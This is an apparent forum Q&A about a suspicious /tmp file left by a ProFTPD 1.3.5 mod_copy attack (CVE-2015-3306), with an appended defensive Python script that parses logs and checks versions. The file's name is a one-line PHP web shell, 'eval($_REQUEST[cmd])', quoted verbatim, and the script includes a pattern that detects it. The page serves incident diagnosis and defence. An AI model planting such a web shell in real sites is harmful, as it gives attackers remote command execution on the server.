
I recently discovered a hidden file in /tmp owned by proftpd that worries me a bit:

-rw-r--r-- 1 proftpd nogroup <timestamp> 86 .<?php eval($_REQUEST[cmd]); ?> 

I tried to see its content in a text editor, but this was probably a bad move since it alters the last access time property. Anyway, here is the output from stat:

  File: ‘/tmp/.<?php eval($_REQUEST[cmd]);?>’
  Size: 86        Blocks: 8          IO Block: 4096   regular file
Device: fc00h/64512d    Inode: 175564      Links: 1
Access: (0644/-rw-r--r--)  Uid: (  113/ proftpd)   Gid: (65534/ nogroup)
Access: <another-timestamp>
Modify: <one-timestamp>
Change: <one-timestamp>
 Birth: -

Checking the proftpd log at the time the file was modified gives me a lot of entries like this:

<timestamp> <myhost> proftpd[9114] localhost.localdomain (<some-naughty-domain>[<IP>]): error opening destination file '/var/www/public_html/<hosted-domain>/www/dbvar.php' for copying: No such file or directory

Could this file be used as part of an exploit?

I am working in a LAMP server environment.

1 Answer

It seems that someone is using this exploit:

ProFTPd 1.3.5 - File Copy

https://www.exploit-db.com/exploits/36742/

Here is also CVE-2015-3306:

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3306

Check your proftpd version with proftpd -v; if it's still an old version, then update to 1.3.6rc1. If you want something better, consider using sftp and not ftp.
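As an added example (not part of the question or the answer above), the following Python script turns the two artefacts in the question into repeatable triage checks: it parses ProFTPD log lines of the "error opening destination file ... for copying" form, keeps only the copy attempts aimed at .php files under a web root, counts attempts per source IP, flags file names that embed a PHP open tag (as the /tmp entry does), and reads the version from proftpd -v output against the 1.3.6 floor the answer recommends. The sample log lines are constructed from the single entry quoted in the question with placeholder hosts and IPs; the assumed proftpd -v output format ("ProFTPD Version 1.3.5") and the /var/www web root are assumptions, not facts from the page.

```python
import re
from collections import Counter

# Constructed sample log lines, modelled on the single entry quoted in the question.
# Hostnames, IPs and timestamps are placeholders, not real indicators.
SAMPLE_LOG = """\
Apr 16 10:01:02 myhost proftpd[9114] localhost.localdomain (evil.example[203.0.113.5]): error opening destination file '/var/www/public_html/victim.example/www/dbvar.php' for copying: No such file or directory
Apr 16 10:01:03 myhost proftpd[9114] localhost.localdomain (evil.example[203.0.113.5]): error opening destination file '/var/www/public_html/victim.example/www/config.php' for copying: No such file or directory
Apr 16 10:02:10 myhost proftpd[9120] localhost.localdomain (alice.example[198.51.100.7]): USER alice: Login successful.
"""

# Pattern for the "error opening destination file ... for copying" message quoted in the question.
COPY_ERROR = re.compile(
    r"proftpd\[(?P<pid>\d+)\] \S+ "
    r"\((?P<host>[^\[]+)\[(?P<ip>[^\]]+)\]\): "
    r"error opening destination file '(?P<dest>[^']+)' for copying"
)

# A file whose *name* contains a PHP open tag is a red flag: the name itself is the
# payload, exactly as with the /tmp entry in the question.
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)


def parse_copy_errors(log_text):
    """Return one dict per copy-error line: pid, remote host, remote ip, destination path."""
    events = []
    for line in log_text.splitlines():
        m = COPY_ERROR.search(line)
        if m:
            events.append(m.groupdict())
    return events


def flag_webroot_targets(events, webroots=("/var/www",)):
    """Keep only copy attempts whose destination is a .php file under a web root.

    A copy *into* a served directory is the step that would turn a stray file into a
    web-reachable script, so these are the events worth alerting on first.
    """
    roots = tuple(webroots)
    return [e for e in events if e["dest"].endswith(".php") and e["dest"].startswith(roots)]


def attempts_by_source(events):
    """Count copy attempts per remote IP so repeated probing stands out."""
    return Counter(e["ip"] for e in events)


def suspicious_names(filenames):
    """Return file names that embed a PHP open tag (e.g. the /tmp entry in the question)."""
    return [name for name in filenames if PHP_TAG.search(name)]


def needs_update(version_output):
    """True if the proftpd -v output reports a version below 1.3.6.

    Assumes the output looks like "ProFTPD Version 1.3.5" (possibly with a letter or
    rcN suffix); the 1.3.6 floor follows the answer's advice to move to 1.3.6rc1.
    """
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", version_output)
    if not m:
        raise ValueError("could not find a version number in: %r" % version_output)
    return tuple(int(x) for x in m.groups()) < (1, 3, 6)


if __name__ == "__main__":
    found = parse_copy_errors(SAMPLE_LOG)
    for e in flag_webroot_targets(found):
        print("copy attempt from %s (%s) -> %s" % (e["ip"], e["host"], e["dest"]))
    print("attempts per source:", dict(attempts_by_source(found)))
    print("suspicious names:", suspicious_names([".<?php eval($_REQUEST[cmd]); ?>", ".X11-unix"]))
    print("needs update:", needs_update("ProFTPD Version 1.3.5"))
```

To use it against a real host, feed the contents of the ProFTPD log to parse_copy_errors, a directory listing of /tmp to suspicious_names, and the output of proftpd -v to needs_update; the per-source counter is what you would hand to the firewall or abuse report once the version has been updated.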
